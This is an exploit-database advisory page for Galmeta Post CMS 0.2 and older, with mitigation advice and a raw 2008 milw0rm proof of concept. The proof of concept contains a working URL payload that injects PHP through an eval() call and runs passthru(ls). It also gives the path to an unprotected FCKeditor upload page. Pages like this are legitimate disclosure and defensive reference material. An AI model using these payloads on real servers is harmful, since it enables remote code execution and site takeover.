header-logo
Suggest Exploit
vendor:
Galmeta Post CMS
by:
CWH Underground
N/A
CVSS
HIGH
Remote Code Execution / Arbitrary File Upload
CWE
Product Name: Galmeta Post CMS
Affected Version From: 0.2 and lower
Affected Version To: 0.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload

This exploit allows an attacker to execute remote code or upload arbitrary files on Galmeta Post CMS version 0.2 or lower. The first vulnerability is in the 'adodb-perf-module.inc.php' file, where an attacker can execute arbitrary PHP code. The second vulnerability is in the 'test.html' file of FCKeditor, where an attacker can upload arbitrary files. Restricting access to trusted users is recommended.

Mitigation:

Upgrade to a version higher than 0.2. Restrict access to trusted users for the 'test.html' file of FCKeditor.
Source

Exploit-DB raw data:

###################################################################################
## Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload
## Script : http://downloads.sourceforge.net/galmetapost
## You Can Get Multiple Local File Inclusion Vulnerabilities To This Script 
## From Here http://www.milw0rm.com/exploits/5944 By CWH Underground
###################################################################################
###################################################################################
###################################################################################
## Vulns & POC :
##  1- Remote Code Execution Vulnerability In \_lib\adodb_lite\adodb-perf-module.inc.php
##  In Line 20 :
##  eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }');
##                    -----------------------------------
##  Ex : /_lib/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###################################################################################
###################################################################################
###################################################################################
##  2- (FCKeditor) Remote Arbitrary File Upload In \_lib\fckeditor\editor\filemanager\upload\test.html
##                    -----------------------------------
##  Ex : /_lib/fckeditor/editor/filemanager/upload/test.html
##  Restrict And Grant Only Trusted Users Access To The Resources.
###################################################################################

# milw0rm.com [2008-09-23]